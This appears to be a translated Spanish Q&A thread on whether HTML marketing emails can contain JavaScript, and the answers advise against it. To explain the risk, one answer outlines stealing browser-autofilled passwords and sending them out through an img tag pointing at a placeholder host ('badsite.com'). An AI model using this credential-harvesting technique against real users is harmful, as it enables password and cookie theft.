para example enviar emailjs correo con codigo javascript email web-applications dhtml

example - ¿Es posible/recomendable enviar correos electrónicos HTML que contengan Javascript?



send email javascript example (5)

Esta es, en general, una pregunta retórica, por lo que he comprobado, la respuesta es "no molestes", pero quería estar realmente seguro.

Tenemos una aplicación de correo electrónico, donde puede enviar correos electrónicos a listas de suscriptores. Esto no es spam: se usa, por ejemplo, en una universidad para enviar comunicaciones a sus estudiantes, en un museo para enviar correos electrónicos a suscriptores, etc.

Recientemente, un posible cliente me preguntó si era posible enviar mensajes html que contengan javascript sin marcarse como spam.

Sin saber, hice un viaje corto de las redes y lo que tengo es (porcentajes de mi posterior) ''la mitad de los clientes no se mostrarán correctamente'', ''la mitad de los clientes lo marcarán como correo no deseado'' y ''la mitad los clientes habrán bloqueado el Javascript por completo ''(claramente hay una superposición).

Entonces, la mejor solución parece ser agregar un enlace a una página adecuada si es realmente necesario. ¿Tienes una experiencia diferente? ¿Conoces alguna solución de combinación de correo electrónico que ofrezca esta función? ¿Sabes si los clientes específicos lo aceptan o se niegan a mostrar html con javascript?


Como el spam es tan importante, me limitaría a enviar correos electrónicos básicos que sean fáciles de consumir. Siempre puede vincular a una página web que tiene su javascript en él. También puede enviar un parámetro querystring en la URL para rastrear a los usuarios que están más interesados ​​en sus correos electrónicos porque esto le indicará que están haciendo clic en ellos. Entonces, si bien es posible, probablemente sea mejor evitarlo.


Ha enumerado los argumentos correctos contra el uso de JavaScript en los correos electrónicos. Estos te muestran que es una mala idea. Vincular a una página donde puede usar javascript libremente es una buena opción y le permite al usuario decidir si quiere acceder a este contenido "mejorado" y cuándo quiere hacerlo.


Sí, es posible pero no recomendado. por razones de seguridad, la mayoría de los programas de administración de correo bloqueaban js o daban alerta si incluían js. si el usuario es estricto para el spam, entonces este correo también pasa al correo no deseado.


El problema de JavaScript es que plantea una amenaza a la seguridad. Si hay un cliente de correo electrónico que lo acepta, es muy probable que sea una vulnerabilidad de seguridad y deba corregirse.

Entonces, realmente, "ni siquiera te molestes", porque incluso si funciona, pronto dejará de funcionar.

EDITAR: Algunas personas no parecen entender por qué es un riesgo de seguridad, así que lo explicaré.

Considere el siguiente código (una de las múltiples formas de robar contraseñas usando Javascript y clientes de correo electrónico no seguros).

Usando JavaScript:

  1. Cree un formulario con campos de entrada de "nombre de usuario" y "contraseña".
  2. Permita que el navegador recuerde automáticamente el contenido de estos campos (varios usuarios almacenan el nombre de usuario y la contraseña en la memoria del navegador para evitar tener que escribirlos y recordarlos siempre).
  3. Una vez que ambos campos se llenan (automáticamente), envíe su contenido a su sitio web usando algo como <img src="badsite.com/senddata?username=user&password=pass"> .
  4. ¡Felicitaciones! ¡Has robado una contraseña!

Por lo general, solo crear un formulario usando JavaScript en su propio sitio web no seguro no es dañino por sí solo porque el navegador es lo suficientemente inteligente como para decirle datos de gmail solo a gmail (y generalmente no intenta robar contraseñas de su propio sitio web, y ese caso habría formas más fáciles de robarlos de todos modos).

Sin embargo, si permitía JavaScript en los correos electrónicos, entonces el navegador no sería capaz de separar el JavaScript legítimo del código inseguro.

El robo de cookies también es posible si un cliente de correo electrónico no puede filtrar JavaScript.


Es una vulnerabilidad en los navegadores si el correo electrónico se vincula a un cliente que tiene su nombre de usuario y contraseña en caché ... Generalmente, los correos electrónicos se abren en los navegadores ...